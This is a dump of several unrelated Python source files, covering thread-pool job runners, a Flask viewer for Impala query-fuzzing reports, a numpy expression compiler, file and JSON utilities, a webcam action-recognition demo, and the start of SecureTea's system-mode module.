class MultiThreadingJobRunner(JobRunner):
def __init__(self, jobs, parallel_jobs=1, done_async=True, delay_secs=0, use_daemons=False):
super().__init__(jobs)
self.parallel_jobs = parallel_jobs
self._done_async = done_async
self._delay = delay_secs # short sleep between enqueued jobs to make console more readable
self._daemons = use_daemons
def _run(self):
signal_handler(signal.SIGINT, self.stop)
signal_handler(signal.SIGTERM, self.stop)
q = queue.Queue()
def worker():
while True:
job = q.get()
if job is None or self.state == State.stopping:
q.task_done()
break
result, duration = job.start()
if job.state is not State.rescheduled:
self.results.append(Namespace(name=job.name, result=result, duration=duration))
if self._done_async:
job.done()
self.stop_if_complete()
q.task_done()
threads = []
for _ in range(self.parallel_jobs):
thread = threading.Thread(target=worker, daemon=self._daemons)
thread.start()
threads.append(thread)
try:
for job in self:
if self.state == State.stopping:
break
q.put(job) # TODO: timeout
if self._delay > 0:
time.sleep(self._delay)
q.join()
finally:
for _ in range(self.parallel_jobs):
q.put(None) # stopping workers
for thread in threads:
thread.join()
if not self._done_async:
for job in self.jobs:
job.done()
class MultiProcessingJobRunner(JobRunner):
pass
""" Experimental: trying to simplify multi-threading/processing"""
class ExecutorJobRunner(JobRunner):
def __init__(self, pool_executor_class, jobs, parallel_jobs):
super().__init__(jobs)
self.pool_executor_class = pool_executor_class
self.parallel_jobs = parallel_jobs
def _run(self):
def worker(job):
result, duration = job.start()
job.done()
return Namespace(name=job.name, result=result, duration=duration)
with self.pool_executor_class(max_workers=self.parallel_jobs) as executor:
self.results.extend(executor.map(worker, self.jobs))
# futures = []
# for job in self.jobs:
# future = executor.submit(worker, job)
# # future.add_done_callback(lambda _: job.done())
# futures.append(future)
# for future in as_completed(futures):
# self.results.append(future.result())
class ThreadPoolExecutorJobRunner(ExecutorJobRunner):
def __init__(self, jobs, parallel_jobs):
super().__init__(ThreadPoolExecutor, jobs, parallel_jobs)
class ProcessPoolExecutorJobRunner(ExecutorJobRunner):
def __init__(self, jobs, parallel_jobs):
super().__init__(ProcessPoolExecutor, jobs, parallel_jobs)
|
front_end.py | #!/usr/bin/env impala-python
# Copyright (c) 2015 Cloudera, Inc. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import pickle
import os
import time
import stat
from time import sleep
from flask import Flask, render_template, request
from schedule_item import ScheduleItem
from controller import PATH_TO_REPORTS, PATH_TO_SCHEDULE
from threading import Thread
from tests.comparison.query_profile import DefaultProfile
from tests.comparison.db_types import (
Boolean,
Char,
Decimal,
Float,
Int,
TYPES,
Timestamp)
MAX_REPORT_AGE = 21 * 24 * 3600 # 21 days
SLEEP_LENGTH = 20 * 60 # 20 min
app = Flask(__name__)
app.reports = {}
ASSETS = {'bootstrap_css': 'css/bootstrap.min.css',
'hljs_css': 'css/default.css',
'favicon': 'favicon.ico',
'bootstrap_js': 'js/bootstrap.min.js',
'hljs_js': 'js/highlight.pack.js'}
@app.route('/reports/<report_id>')
def show_report(report_id):
'''Renders a report as HTML. '''
if report_id not in app.reports:
with open(os.path.join(PATH_TO_REPORTS, report_id), 'r') as f:
app.reports[report_id] = pickle.load(f)
report = app.reports[report_id]
def get_next_id():
'''Generates all natural numbers. '''
i = 0
while True:
yield str(i)
i += 1
gen = get_next_id()
# Generate HTML for displaying the crashes
outer_crashes_list = []
for first_impala_frame in report.grouped_stacks:
crashes_list = []
# results are sorted on the length of the query SQL
for result in sorted(report.grouped_stacks[first_impala_frame],
key = lambda result: len(result['test_sql'])):
inner_id = next(gen)
inner_title = 'Lines in Stack: {0}'.format(
len(result['formatted_stack'].split('\n')))
content = ('<h4>Impala Query:</h4><pre><code>{0}</code></pre>'
'<h4>Stack:</h4><pre>{1}</pre>').format(
result['test_sql'], result['formatted_stack'][:50000])
crashes_list.append((inner_id, inner_title, content))
id = next(gen)
title = first_impala_frame
outer_crashes_list.append((id, title, crashes_list))
# Generate HTML for displaying result row count mismatches
row_count_list = []
for result in sorted(report.grouped_results['row_counts'],
key = lambda result: len(result['test_sql'])):
id = next(gen)
title = 'Impala Rows: {0}, Postgres Rows: {1}'.format(
result['test_row_count'], result['ref_row_count'])
content = ('<h4>Impala Query:</h4><pre><code>{0}</code></pre>'
'<h4>Postgres Query:</h4><pre><code>{1}</code></pre>').format(
result['test_sql'], result['ref_sql'])
row_count_list.append((id, title, content))
# Generate HTML for displaying result content mismatches
mismatch_list = []
for result in sorted(report.grouped_results['mismatch'],
key = lambda result: len(result['test_sql'])):
id = next(gen)
title = 'Query Length: {0}'.format(len(result['test_sql']))
content = ('<h4>Impala Query:</h4><pre><code>{0}</code></pre>'
'<h4>Postgres Query:</h4><pre><code>{1}</code></pre>'
'<h4>Mismatch Impala Row:</h4><pre><code>{2}</code></pre>'
'<h4>Mismatch Postgres Row:</h4><pre><code>{3}</code></pre>').format(
result['test_sql'],
result['ref_sql'],
result['mismatch_test_row'],
result['mismatch_ref_row'])
mismatch_list.append((id, title, content))
return render_template(
'report.template',
assets=ASSETS,
report=report,
outer_crashes_list=outer_crashes_list,
row_count_list=row_count_list,
mismatch_list=mismatch_list)
@app.route('/start_run', methods=['POST', 'GET'])
def start_run():
'''Method that receives POST requests and generates a schedule item.'''
if request.method != 'POST': return 'fail'
if 'time_limit' in request.form:
# This is a custom run because time_limit item is present only in the custom_run form.
# Values will be extracted from the form and a new profile will be generated.
new_profile = DefaultProfile()
# Bounds
new_profile._bounds['MAX_NESTED_QUERY_COUNT'] = (
int(request.form['max_nested_query_count_from']),
int(request.form['max_nested_query_count_to']))
new_profile._bounds['MAX_NESTED_EXPR_COUNT'] = (
int(request.form['max_nested_expr_count_from']),
int(request.form['max_nested_expr_count_to']))
new_profile._bounds['SELECT_ITEM_COUNT'] = (
int(request.form['select_item_count_from']),
int(request.form['select_item_count_to']))
new_profile._bounds['WITH_TABLE_COUNT'] = (
int(request.form['with_table_count_from']),
int(request.form['with_table_count_to']))
new_profile._bounds['TABLE_COUNT'] = (
int(request.form['table_count_from']),
int(request.form['table_count_to']))
new_profile._bounds['ANALYTIC_LEAD_LAG_OFFSET'] = (
int(request.form['analytic_lead_lag_offset_from']),
int(request.form['analytic_lead_lag_offset_to']))
new_profile._bounds['ANALYTIC_WINDOW_OFFSET'] = (
int(request.form['analytic_window_offset_from']),
int(request.form['analytic_window_offset_to']))
# Select Item Category
new_profile._weights['SELECT_ITEM_CATEGORY']['AGG'] = int(
request.form['select_agg'])
new_profile._weights['SELECT_ITEM_CATEGORY']['ANALYTIC'] = int(
request.form['select_analytic'])
new_profile._weights['SELECT_ITEM_CATEGORY']['BASIC'] = int(
request.form['select_basic'])
# Types
new_profile._weights['TYPES'][Boolean] = int(request.form['types_boolean'])
new_profile._weights['TYPES'][Char] = int(request.form['types_char'])
new_profile._weights['TYPES'][Decimal] = int(request.form['types_decimal'])
new_profile._weights['TYPES'][Float] = int(request.form['types_float'])
new_profile._weights['TYPES'][Int] = int(request.form['types_int'])
new_profile._weights['TYPES'][Timestamp] = int(request.form['types_timestamp'])
# Join
new_profile._weights['JOIN']['INNER'] = int(request.form['join_inner'])
new_profile._weights['JOIN']['LEFT'] = int(request.form['join_left'])
new_profile._weights['JOIN']['RIGHT'] = int(request.form['join_right'])
new_profile._weights['JOIN']['FULL_OUTER'] = int(request.form['join_full_outer'])
new_profile._weights['JOIN']['CROSS'] = int(request.form['join_cross'])
# Optional Query Clauses Probabilities
new_profile._probabilities['OPTIONAL_QUERY_CLAUSES']['WITH'] = float(
request.form['optional_with'])
new_profile._probabilities['OPTIONAL_QUERY_CLAUSES']['FROM'] = float(
request.form['optional_from'])
new_profile._probabilities['OPTIONAL_QUERY_CLAUSES']['WHERE'] = float(
request.form['optional_where'])
new_profile._probabilities['OPTIONAL_QUERY_CLAUSES']['GROUP_BY'] = float(
request.form['optional_group_by'])
new_profile._probabilities['OPTIONAL_QUERY_CLAUSES']['HAVING'] = float(
request.form['optional_having'])
new_profile._probabilities['OPTIONAL_QUERY_CLAUSES']['UNION'] = float(
request.form['optional_union'])
new_profile._probabilities['OPTIONAL_QUERY_CLAUSES']['ORDER_BY'] = float(
request.form['optional_order_by'])
# Optional Analytic Clauses Probabilities
new_profile._probabilities['OPTIONAL_ANALYTIC_CLAUSES']['PARTITION_BY'] = float(
request.form['optional_analytic_partition_by'])
new_profile._probabilities['OPTIONAL_ANALYTIC_CLAUSES']['ORDER_BY'] = float(
request.form['optional_analytic_order_by'])
new_profile._probabilities['OPTIONAL_ANALYTIC_CLAUSES']['WINDOW'] = float(
request.form['optional_analytic_window'])
# Misc Probabilities
new_profile._probabilities['MISC']['INLINE_VIEW'] = float(
request.form['misc_inline_view'])
new_profile._probabilities['MISC']['SELECT_DISTINCT'] = float(
request.form['misc_select_distinct'])
new_profile._probabilities['MISC']['SCALAR_SUBQUERY'] = float(
request.form['misc_scalar_subquery'])
new_profile._probabilities['MISC']['UNION_ALL'] = float(
request.form['misc_union_all'])
# Analytic Designs
new_profile._flags['ANALYTIC_DESIGNS']['TOP_LEVEL_QUERY_WITHOUT_LIMIT'] = \
'analytic_designs_top_level_no_limit' in request.form
new_profile._flags['ANALYTIC_DESIGNS']['DETERMINISTIC_ORDER_BY'] = \
'analytic_designs_deterministic_order_by' in request.form
new_profile._flags['ANALYTIC_DESIGNS']['NO_ORDER_BY'] = \
'analytic_designs_no_order_by' in request.form
new_profile._flags['ANALYTIC_DESIGNS']['ONLY_SELECT_ITEM'] = \
'analytic_designs_only_select_item' in request.form
new_profile._flags['ANALYTIC_DESIGNS']['UNBOUNDED_WINDOW'] = \
'analytic_designs_unbounded_window' in request.form
new_profile._flags['ANALYTIC_DESIGNS']['RANK_FUNC'] = \
'analytic_designs_rank_func' in request.form
schedule_item = ScheduleItem(
run_name=request.form['run_name'],
query_profile=new_profile,
time_limit_sec=int(request.form['time_limit']),
git_command=request.form['git_command'],
parent_job='')
else:
# Run based on previous run
schedule_item = ScheduleItem(
run_name=request.form['run_name'],
query_profile=DefaultProfile(),
time_limit_sec=24 * 3600,  # Default time limit is 24 hours
git_command=request.form['git_command'],
parent_job=request.form['report_id'])
schedule_item.save_pickle()
return 'success'
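# A hypothetical client-side sketch of the non-custom branch above (the
# custom_run form additionally posts every bound, weight, probability and
# flag field consumed earlier); host and field values are placeholders:
#
#   import requests
#   requests.post('http://localhost:5000/start_run',
#                 data={'run_name': 'nightly',
#                       'git_command': 'git fetch',
#                       'report_id': '<existing report id>'})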
@app.route("/custom_run")
def custom_run():
'''Render the custom run page.
'''
return render_template(
'custom_run.template',
assets=ASSETS)
def reload_reports():
'''Reload reports in the reports directory every 20 minutes. Loaded reports are placed
into app.reports. This allows new reports to appear on the front page. Only reports
from the past 7 days are loaded. This method should be run in a separate thread.
'''
while True:
new_reports = {}
report_ids = os.listdir(PATH_TO_REPORTS)
for report_id in report_ids:
file_age = time.time() - os.stat(
os.path.join(PATH_TO_REPORTS, report_id))[stat.ST_MTIME]
if file_age < MAX_REPORT_AGE:
# We want this report
if report_id in app.reports:
new_reports[report_id] = app.reports[report_id]
else:
with open(os.path.join(PATH_TO_REPORTS, report_id), 'r') as f:
new_reports[report_id] = pickle.load(f)
app.reports = new_reports
sleep(SLEEP_LENGTH)
@app.route("/")
def front_page():
'''Renders the front page as HTML.
'''
schedule_item_ids = os.listdir(PATH_TO_SCHEDULE)
schedule_items = []
for schedule_item_id in schedule_item_ids:
with open(os.path.join(PATH_TO_SCHEDULE, schedule_item_id), 'r') as f:
schedule_items.append(pickle.load(f))
return render_template(
'index.template',
assets=ASSETS,
reports=sorted(
app.reports.items(), key=lambda item: item[1].run_date, reverse=True),
schedule_items=schedule_items)
if __name__ == '__main__':
thread = Thread(target=reload_reports)
thread.daemon = True
thread.start()
app.run(host='0.0.0.0', debug=False)
|
numpy_compiler.py |
from .lambda_compiler import LambdaCompiler, visitor
import numpy as np
from .. import expression as e
from .. import functions as f
from mpmath import mp
class NumpyCompiler(LambdaCompiler):
def __init__(self):
super(NumpyCompiler,self).__init__()
@visitor.on('expr', parent=LambdaCompiler)
def visit(self, expr):
raise ValueError('cannot compile expression: %s' % expr)
def get_function(self,name):
func = None
if name in np.__dict__:
return np.__dict__[name]
if name[0] == 'a':
arcname = 'arc' + name[1:]
if arcname in np.__dict__:
return np.__dict__[arcname]
return None
@visitor.function(f.InnerPiecewise)
def visit(self, expr):
restype = f.Type(expr).evaluate(cache=self.cache).value
if isinstance(restype, f.TypeInfo):
ptype = restype.__dict__.get('python_type')
else:
ptype = None
cond_args = [self.visit(arg.args[1]) for arg in expr.args]
eval_args = [self.visit(arg.args[0]) for arg in expr.args]
def evaluate(args):
#dtype = ptype if ptype is not None else args['_dtype']
#shape = args['_shape']
#res = np.zeros(shape,dtype = dtype)
#unset = np.ones(shape,dtype = bool)
is_arr = False
for cond, val in zip(cond_args, eval_args):
valid = cond(args)
# shapes are tuples, so compare against (1,); comparing with [1] never matched
if not isinstance(valid, np.ndarray) or valid.shape == (1,):
if not valid:
continue
if valid:
if not is_arr:
return val(args)
valid = unset
else:
if not is_arr:
if np.all(valid):
return val(args)
if not np.any(valid):
continue
shape = valid.shape
is_arr = True
unset = np.ones(shape, dtype=bool)
if ptype:
res = np.zeros(shape, dtype=ptype)
else:
res = np.zeros(shape)
valid &= unset
new_args = {name: arg[valid] if isinstance(arg, np.ndarray) and arg.shape == shape else arg
for name, arg in args.iteritems()}
values = np.array(val(new_args))
if not np.can_cast(values.dtype, res.dtype):
res = res.astype(values.dtype)
res[valid] = values
unset &= np.logical_not(valid)
return res
return evaluate
@visitor.obj(e.Number)
def visit(self, expr):
v = expr.value
return lambda args: v
@visitor.function(f.Not)
def visit(self, expr):
arg = self.visit(expr.args[0])
return lambda args: np.logical_not(arg(args))
@visitor.function(f.Max)
def visit(self, expr):
arguments = [self.visit(arg) for arg in expr.args]
# np.maximum/np.minimum are binary ufuncs; a third positional argument would
# be treated as the `out` array, so fold over the operands instead
return lambda args: reduce(np.maximum, [arg(args) for arg in arguments])
@visitor.function(f.Min)
def visit(self, expr):
arguments = [self.visit(arg) for arg in expr.args]
return lambda args: reduce(np.minimum, [arg(args) for arg in arguments])
@visitor.function(f.ArrayAccess)
def visit(self, expr):
array = expr.args[0].value
indices = [self.visit(arg) for arg in expr.args[1:]]
def access_function(args):
idx = [arg(args) for arg in indices[::-1]]
shape = None
for i in idx:
if isinstance(i,np.ndarray):
shape = i.shape
break
if shape is not None:
idx = [arg.astype(int) if isinstance(arg, np.ndarray) else int(arg) * np.ones(shape, dtype=int)
for arg in idx]
else:
idx = [int(arg) for arg in idx]
valid = reduce(np.logical_and,[ (i >= 0) & (i<s) for i,s in zip(idx,array.shape) ])
if np.all(valid):
return array[tuple(idx)]
if not np.any(valid):
return self.value_converter(0)
res = np.zeros(valid.shape, dtype=array.dtype)
idx = [i[valid] for i in idx]
res[valid] = array[tuple(idx)]
return res
return access_function
@visitor.obj(mp.mpc)
def visit(self, expr):
return lambda args: complex(expr.value)
@visitor.obj(mp.mpf)
def visit(self, expr):
return lambda args: float(expr.value)
def get_example_arg(args):
for arg in args.values():
if isinstance(arg, np.ndarray):
return arg
for arg in args.values():
if hasattr(arg, "__len__"):
return arg
return args.values()[0]
def prepare_arguments(args):
example_arg = get_example_arg(args)
if not hasattr(example_arg,"__len__"):
shape = None
args = { name:np.array([arg]) for name,arg in args.iteritems() }
else:
shape = np.array(example_arg).shape
args = { name:(np.array(arg) if hasattr(arg,"__len__") else arg) for name,arg in args.iteritems() }
return args,shape
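# A small sketch of the normalization above (hypothetical inputs): scalar
# arguments are wrapped in length-1 arrays with shape None so the caller can
# unwrap the result later, while array-like arguments fix the broadcast shape:
#
#   prepare_arguments({'x': 2.0})        -> ({'x': array([2.0])}, None)
#   prepare_arguments({'x': [1.0, 2.0]}) -> ({'x': array([1.0, 2.0])}, (2,))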
def make_parallel(f):
import threading
from multiprocessing import cpu_count
def run_parallel_thread(_processes=cpu_count(), **args):
args,shape = prepare_arguments(args)
size = shape[0] if shape else 1
_processes = min(size,_processes)
if _processes == 1:
return f(**args)
step = int(size/_processes)
slices = [[i*step,(i+1)*step] for i in range(_processes)]
slices[-1][1] = size
result = np.zeros(shape,dtype = f.restype)
def worker(s,args):
args = {name: value[s[0]:s[1]] if isinstance(value, np.ndarray) and value.shape == shape else value
for name, value in args.iteritems()}
args['_slice'] = s
result[s[0]:s[1]] = f(**args)
threads = []
for s in slices:
t = threading.Thread(target=worker,args=[s,args])
threads.append(t)
t.start()
for t in threads:
t.join()
return result
return run_parallel_thread
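# Note: the workers above are threads rather than processes. This still scales
# because the heavy lifting happens inside numpy ufuncs, which release the GIL
# during their C-level loops, and each worker writes into a disjoint slice of
# the shared `result` array, so no locking is needed.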
def numpyfy(expr, parallel=False, restype=None):
from expresso.pycas.evaluators.optimizers import optimize_for_compilation
compiler = NumpyCompiler()
res = compiler.visit(optimize_for_compilation(e.S(expr)))
if restype is None:
restype = f.Type(expr).evaluate(cache=compiler.cache).value
if isinstance(restype, f.TypeInfo):
restype = restype.__dict__.get('python_type')
if restype is None:
restype = complex
else:
restype = complex
def call(**args):
args,shape = prepare_arguments(args)
cres = np.array(res(args)).astype(restype)
if not shape:
if cres.shape:
cres = cres[0]
elif cres.shape != shape:
cres = np.ones(shape) * cres
return cres
call.restype = restype
if parallel:
return make_parallel(call)
else:
return call
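# A minimal usage sketch (hypothetical symbols; assumes `x` is a pycas symbol
# and `sin` the matching function wrapper from this package):
#
#   fn = numpyfy(sin(x) * x, restype=float)
#   fn(x=np.linspace(0, np.pi, 100))  # vectorized evaluation, shape (100,)
#   fn(x=0.5)                         # scalar in, scalar out
#   pf = numpyfy(sin(x) * x, parallel=True)
#   pf(x=np.linspace(0, np.pi, 10**6), _processes=4)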
def ncompile(*function_definitions):
functions = {}
for definition in function_definitions:
if definition.return_type is not None:
restype = definition.return_type.value.__dict__.get('python_type')
else:
restype = None
func = numpyfy(definition.expr, parallel=definition.parallel, restype=restype)
if definition.arg_types:
# TODO: implement argument type conversions
arg_types = [arg.value.__dict__.get('python_type') for arg in definition.arg_types]
arg_names = [arg.name for arg in definition.args]
class Delegate(object):
def __init__(self, f, arg_names):
self.f = f
self.arg_names = arg_names
def __call__(self, *args, **kwargs):
args = {n: a for n, a in zip(self.arg_names, args)}
res = kwargs.pop('res',None)
if res is not None:
res[:] = self.f(**args)
return res
else:
return self.f(**args)
functions[definition.name] = Delegate(func, arg_names)
class lib(object):
def __init__(self,functions):
self.__dict__.update(functions)
return lib(functions)
|
utils.py | from threading import Lock, Thread, active_count as threading_active_count
from posixpath import join as os_join, normpath as os_normpath
from json import load as json_load, dump as json_dump
from subprocess import Popen, PIPE
from calendar import monthrange
from httplib2 import Http
from shutil import rmtree
from time import sleep
import datetime
import os
def mkpath(*paths):
return os_normpath(os_join(*paths))
def _pass(*args, **kwargs):
pass
def clear_folder(path, folders=False):
for item in os.listdir(mkpath(path)):
if os.path.isfile(mkpath(path, item)):
os.remove(mkpath(path, item))
elif folders and os.path.isdir(mkpath(path, item)):
# only remove subdirectories when explicitly requested
rmtree(mkpath(path, item))
def create_folder_if_absent(path):
if not os.path.isdir(mkpath(path)):
os.makedirs(mkpath(path))
def add_months(sourcedate, months):
month = sourcedate.month - 1 + months
year = sourcedate.year + month // 12
month = month % 12 + 1
day = min(sourcedate.day, monthrange(year, month)[1])
return datetime.date(year, month, day)
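# Examples, following the day-clamping logic above:
#   add_months(datetime.date(2020, 1, 31), 1)  -> datetime.date(2020, 2, 29)
#   add_months(datetime.date(2019, 11, 15), 3) -> datetime.date(2020, 2, 15)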
def remove_metadata(path, extension="jpg", exiftool=mkpath("exiftool", "exiftool")):
print('Removing metadata in "{}"...'.format(path))
s = Popen(
# exiftool -all= --icc_profile:all -overwrite_original -progress -ext jpg -r "../api" [recursive]
"\"{}\" -all= --icc_profile:all -overwrite_original -progress -ext \"{}\" \"{}\"".format(exiftool, extension, path),
shell=True,
stdout=PIPE,
stderr=PIPE
).communicate()
s = list(map(lambda x: x.decode("cp1251"), s))
print(s)
class FileDownloader:
def __init__(self):
self.h = Http('cache/.http_cache')
self.thread_lock = Lock()
def download(self, url, path):
with self.thread_lock:
with open(mkpath(path), 'wb') as file:
response, content = self.h.request(url)
file.write(content)
def __del__(self):
if os.path.isdir('cache/.http_cache'):
rmtree('cache/.http_cache')
class SafeJson:
def __init__(self):
self.default_cache_timer = 500 # > 1 is unsafe
self.thread_lock = Lock()
self.cache = {}
self.cache_timer = self.default_cache_timer
# def __del__(self):
# '''Not working: "open" has already been deleted by the GC'''
# self.dump_cache()
def dump(self, path, data, allow_cache=False, ensure_ascii=False, prettify=False, *args, **kwargs):
kwargs["ensure_ascii"] = ensure_ascii
self.cache[os.path.abspath(mkpath(path))] = (data, prettify, args, kwargs)
self.cache_timer -= 1
if not allow_cache or self.cache_timer == 0:
self.dump_cache()
def dump_cache(self):
self.cache_timer = self.default_cache_timer
for filepath, content in self.cache.items():
data, prettify, args, kwargs = content
with self.thread_lock:
with open(filepath, 'w', encoding="utf-8") as file:
if prettify:
json_dump(data, file, indent=4, *args, **kwargs)
else:
json_dump(data, file, separators=(',', ':'), *args, **kwargs)
self.cache = {}
def load(self, path, *args, **kwargs):
with self.thread_lock:
with open(os.path.abspath(mkpath(path)), 'r', encoding="utf-8") as file:
data = json_load(file, *args, **kwargs)
return data
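# A minimal usage sketch (hypothetical path): writes go through the in-memory
# cache and are flushed immediately by default, or in batches of up to
# default_cache_timer writes when allow_cache=True:
#
#   sj = SafeJson()
#   sj.dump('data/state.json', {'count': 1}, allow_cache=True)
#   sj.dump_cache()                   # force a flush of any pending writes
#   state = sj.load('data/state.json')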
class Threads:
def __init__(self):
self.threads = []
def __del__(self):
self.join()
def __enter__(self):
return self
def __exit__(self, type, value, traceback):
self.join()
def add(self, target, args, **kwargs):
self.threads.append(Thread(target=target, args=args, **kwargs))
return self.threads[-1]
def join(self):
for t in self.threads:
t.join()
def active_count(self):
return threading_active_count()
def wait_free(self, count):
while threading_active_count() > count:
sleep(0.01)
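# A minimal usage sketch (hypothetical worker `download`, iterable `urls`):
# the context manager joins all added threads on exit. Note that add() only
# constructs the Thread, so the caller starts it via the returned handle:
#
#   with Threads() as pool:
#       for url in urls:
#           pool.add(download, args=(url, path)).start()
#           pool.wait_free(8)  # keep at most ~8 threads running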
def prettify_data_string(string):
return string.replace("\r\n", '\n').replace("\n\r", '\n').replace('\xa0', ' ').strip()
|
webcam_demo.py | import argparse
import time
from collections import deque
from operator import itemgetter
from threading import Thread
import cv2
import numpy as np
import torch
from mmcv import Config, DictAction
from mmcv.parallel import collate, scatter
from mmaction.apis import init_recognizer
from mmaction.datasets.pipelines import Compose
FONTFACE = cv2.FONT_HERSHEY_COMPLEX_SMALL
FONTSCALE = 1
FONTCOLOR = (255, 255, 255) # BGR, white
MSGCOLOR = (128, 128, 128) # BGR, gray
THICKNESS = 1
LINETYPE = 1
EXCLUDED_STEPS = [
'OpenCVInit', 'OpenCVDecode', 'DecordInit', 'DecordDecode', 'PyAVInit',
'PyAVDecode', 'RawFrameDecode'
]
def parse_args():
parser = argparse.ArgumentParser(description='MMAction2 webcam demo')
parser.add_argument('config', help='test config file path')
parser.add_argument('checkpoint', help='checkpoint file')
parser.add_argument('label', help='label file')
parser.add_argument(
'--device', type=str, default='cuda:0', help='CPU/CUDA device option')
parser.add_argument(
'--camera-id', type=int, default=0, help='camera device id')
parser.add_argument(
'--threshold',
type=float,
default=0.01,
help='recognition score threshold')
parser.add_argument(
'--average-size',
type=int,
default=1,
help='number of latest clips to be averaged for prediction')
parser.add_argument(
'--drawing-fps',
type=int,
default=20,
help='Set upper bound FPS value of the output drawing')
parser.add_argument(
'--inference-fps',
type=int,
default=4,
help='Set upper bound FPS value of model inference')
parser.add_argument(
'--cfg-options',
nargs='+',
action=DictAction,
default={},
help='override some settings in the used config, the key-value pair '
'in xxx=yyy format will be merged into config file. For example, '
"'--cfg-options model.backbone.depth=18 model.backbone.with_cp=True'")
args = parser.parse_args()
assert args.drawing_fps >= 0 and args.inference_fps >= 0, \
'upper bound FPS value of drawing and inference should be set as ' \
'positive number, or zero for no limit'
return args
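# A hypothetical invocation (paths are placeholders for a real config file,
# checkpoint and label map):
#
#   python webcam_demo.py configs/tsn_config.py checkpoints/tsn.pth \
#       demo/label_map.txt --average-size 5 --threshold 0.2 --device cpu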
def show_results():
print('Press "Esc", "q" or "Q" to exit')
text_info = {}
cur_time = time.time()
while True:
msg = 'Waiting for action ...'
_, frame = camera.read()
frame_queue.append(np.array(frame[:, :, ::-1]))
if len(result_queue) != 0:
text_info = {}
results = result_queue.popleft()
for i, result in enumerate(results):
selected_label, score = result
if score < threshold:
break
location = (0, 40 + i * 20)
text = selected_label + ': ' + str(round(score, 2))
text_info[location] = text
cv2.putText(frame, text, location, FONTFACE, FONTSCALE,
FONTCOLOR, THICKNESS, LINETYPE)
elif len(text_info) != 0:
for location, text in text_info.items():
cv2.putText(frame, text, location, FONTFACE, FONTSCALE,
FONTCOLOR, THICKNESS, LINETYPE)
else:
cv2.putText(frame, msg, (0, 40), FONTFACE, FONTSCALE, MSGCOLOR,
THICKNESS, LINETYPE)
cv2.imshow('camera', frame)
ch = cv2.waitKey(1)
if ch == 27 or ch == ord('q') or ch == ord('Q'):
break
if drawing_fps > 0:
# add a limiter for actual drawing fps <= drawing_fps
sleep_time = 1 / drawing_fps - (time.time() - cur_time)
if sleep_time > 0:
time.sleep(sleep_time)
cur_time = time.time()
def inference():
score_cache = deque()
scores_sum = 0
cur_time = time.time()
while True:
cur_windows = []
while len(cur_windows) == 0:
if len(frame_queue) == sample_length:
cur_windows = list(np.array(frame_queue))
if data['img_shape'] is None:
data['img_shape'] = frame_queue.popleft().shape[:2]
cur_data = data.copy()
cur_data['imgs'] = cur_windows
cur_data = test_pipeline(cur_data)
cur_data = collate([cur_data], samples_per_gpu=1)
if next(model.parameters()).is_cuda:
cur_data = scatter(cur_data, [device])[0]
with torch.no_grad():
scores = model(return_loss=False, **cur_data)[0]
score_cache.append(scores)
scores_sum += scores
if len(score_cache) == average_size:
scores_avg = scores_sum / average_size
num_selected_labels = min(len(label), 5)
scores_tuples = tuple(zip(label, scores_avg))
scores_sorted = sorted(
scores_tuples, key=itemgetter(1), reverse=True)
results = scores_sorted[:num_selected_labels]
result_queue.append(results)
scores_sum -= score_cache.popleft()
if inference_fps > 0:
# add a limiter for actual inference fps <= inference_fps
sleep_time = 1 / inference_fps - (time.time() - cur_time)
if sleep_time > 0:
time.sleep(sleep_time)
cur_time = time.time()
camera.release()
cv2.destroyAllWindows()
def main():
global frame_queue, camera, frame, results, threshold, sample_length, \
data, test_pipeline, model, device, average_size, label, \
result_queue, drawing_fps, inference_fps
args = parse_args()
average_size = args.average_size
threshold = args.threshold
drawing_fps = args.drawing_fps
inference_fps = args.inference_fps
device = torch.device(args.device)
cfg = Config.fromfile(args.config)
cfg.merge_from_dict(args.cfg_options)
model = init_recognizer(cfg, args.checkpoint, device=device)
camera = cv2.VideoCapture(args.camera_id)
data = dict(img_shape=None, modality='RGB', label=-1)
with open(args.label, 'r') as f:
label = [line.strip() for line in f]
# prepare test pipeline from non-camera pipeline
cfg = model.cfg
sample_length = 0
pipeline = cfg.data.test.pipeline
pipeline_ = pipeline.copy()
for step in pipeline:
if 'SampleFrames' in step['type']:
sample_length = step['clip_len'] * step['num_clips']
data['num_clips'] = step['num_clips']
data['clip_len'] = step['clip_len']
pipeline_.remove(step)
if step['type'] in EXCLUDED_STEPS:
# remove step to decode frames
pipeline_.remove(step)
test_pipeline = Compose(pipeline_)
assert sample_length > 0
try:
frame_queue = deque(maxlen=sample_length)
result_queue = deque(maxlen=1)
pw = Thread(target=show_results, args=(), daemon=True)
pr = Thread(target=inference, args=(), daemon=True)
pw.start()
pr.start()
pw.join()
except KeyboardInterrupt:
pass
if __name__ == '__main__':
main()
|
system_mode.py | # -*- coding: utf-8 -*-
u"""System Mode for SecureTea.
Project:
╔═╗┌─┐┌─┐┬ ┬┬─┐┌─┐╔╦╗┌─┐┌─┐
╚═╗├┤ │ │ │├┬┘├┤ ║ ├┤ ├─┤
╚═╝└─┘└─┘└─┘┴└─└─┘ ╩ └─┘┴ ┴
Author: Abhishek Sharma <abhishek_official@hotmail.com>, Jul 30 2019
Version: 1.5.1
Module: SecureTea
"""
# Import all the modules necessary for system mode
from securetea.lib.ids import secureTeaIDS
from securetea.lib.log_monitor.system_log import engine
from securetea.lib.antivirus.secureTeaAntiVirus import SecureTeaAntiVirus
from securetea.lib.firewall import secureTeaFirewall
from securetea import logger
import multiprocessing
import sys
class SystemMode(object):
"""SystemMode class."""
def __init__(self, debug=False, cred=None):
"""
Initialize SystemMode.
Args:
debug (bool): Log on terminal or not
cred (dict): Configuration credentials
Raises:
None
Returns:
None
"""
self.debug = debug
# Initialize logger
self.logger = logger.SecureTeaLogger(
__name__,
debug=self.debug
)
# Initialize credentials
if cred is not None:
self.cred = cred
else:
self.logger.log(
"No configuraton parameters found, exiting",
logtype="error"
)
sys.exit(0)
# Initialize objects presence as false
self.firewall = False
self.ids = False
self.antivirus = False
self.system_log = False
# Initialize empty process pool list
self.process_pool = list()
def create_objects(self):
"""
Create module (Firewall, IDS, AntiVirus,
System Log Monitor) objects if configuration
parameters are available for those.
Args:
None
Raises:
None
Returns:
None
"""
if self.cred.get("firewall"):
try:
self.logger.log(
"Initializing Firewall object",
logtype="info"
)
# Initialize Firewall object
